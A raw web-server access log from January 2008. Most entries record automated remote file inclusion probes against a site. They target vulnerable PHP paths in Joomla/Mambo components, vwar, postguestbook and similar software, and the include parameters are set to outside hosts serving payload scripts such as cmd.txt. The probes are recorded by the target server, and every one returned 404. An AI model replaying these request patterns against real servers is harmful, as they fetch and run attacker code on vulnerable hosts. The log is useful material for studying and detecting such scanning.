74.52.170.162 - - [23/Jan/2008:08:01:19 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [23/Jan/2008:08:01:20 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [23/Jan/2008:08:01:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [23/Jan/2008:08:02:02 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [23/Jan/2008:08:02:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:08:03:17 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:08:03:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.140.130 - - [23/Jan/2008:08:08:14 -0800] "GET /logs//cgi-bin//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.140.130 - - [23/Jan/2008:08:08:14 -0800] "GET //cgi-bin//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:15:20 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:15:25 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:15:32 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:15:33 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:15:33 -0800] "GET //administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:15:33 -0800] "GET /logs//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:15:48 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:15:48 -0800] "GET //administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:15:49 -0800] "GET /logs//administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:17:31 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:17:32 -0800] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:17:32 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:18:15 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:18:16 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:18:16 -0800] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:18:16 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:18:20 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:18:27 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:18:34 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:18:34 -0800] "GET //administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:18:34 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:19:42 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:19:42 -0800] "GET //administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:08:19:43 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:08:22:55 -0800] "GET /logs//becommunity/community/index.php?pageurl=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.14.110.31 - - [23/Jan/2008:08:26:53 -0800] "GET /logs/access_080106.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.14.110.31 - - [23/Jan/2008:08:26:53 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:27:35 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:08:28:11 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:08:28:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:08:28:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [23/Jan/2008:08:29:31 -0800] "GET /logs//mambots/content/multithumb/lightbox/css//multithumb.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
72.29.72.181 - - [23/Jan/2008:08:29:32 -0800] "GET //mambots/content/multithumb/lightbox/css//multithumb.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
72.29.72.181 - - [23/Jan/2008:08:29:32 -0800] "GET //mambots/content/multithumb/lightbox/css//multithumb.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.41.238.2 - - [23/Jan/2008:08:31:17 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [23/Jan/2008:08:31:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [23/Jan/2008:08:31:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.26 - - [23/Jan/2008:08:33:35 -0800] "GET /logs/access_070823.log HTTP/1.0" 200 56843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:08:34:45 -0800] "GET /logs/access_080112.log//templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [23/Jan/2008:08:37:23 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [23/Jan/2008:08:37:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [23/Jan/2008:08:37:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.65.116.80 - - [23/Jan/2008:08:40:42 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
81.174.65.31 - - [23/Jan/2008:08:44:21 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:08:47:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.212.130.120 - - [23/Jan/2008:08:53:50 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.120 - - [23/Jan/2008:08:53:50 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.120 - - [23/Jan/2008:08:53:51 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.187.243 - - [23/Jan/2008:08:55:07 -0800] "GET //login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:08:58:19 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:08:58:20 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:08:58:20 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:08:58:38 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:08:59:13 -0800] "GET /logs/access_080112.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:08:59:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:08:59:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [23/Jan/2008:08:59:31 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [23/Jan/2008:08:59:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:01:57 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:01:57 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:01:57 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:09:02:10 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:09:02:10 -0800] "GET //skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:09:02:10 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:02:27 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:02:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:02:27 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:02:35 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:02:36 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:02:36 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:09:02:37 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:09:02:37 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:04:01 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:04:01 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:04:02 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:04:08 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:04:08 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:04:09 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:09:04:30 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:04:43 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:04:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:04:43 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:04:49 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:10:23 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:10:23 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:10:23 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:10:38 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:10:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.124.120 - - [23/Jan/2008:09:10:39 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:11:41 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:11:41 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:11:42 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.187.243 - - [23/Jan/2008:09:13:21 -0800] "GET /logs/access_071229.log//login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [23/Jan/2008:09:13:21 -0800] "GET /logs//login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.16.176.92 - - [23/Jan/2008:09:17:59 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.16.176.92 - - [23/Jan/2008:09:18:01 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.103.8.225 - - [23/Jan/2008:09:18:01 -0800] "GET /logs/customer/product.php?xcart_dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
218.103.8.225 - - [23/Jan/2008:09:18:01 -0800] "GET /customer/product.php?xcart_dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
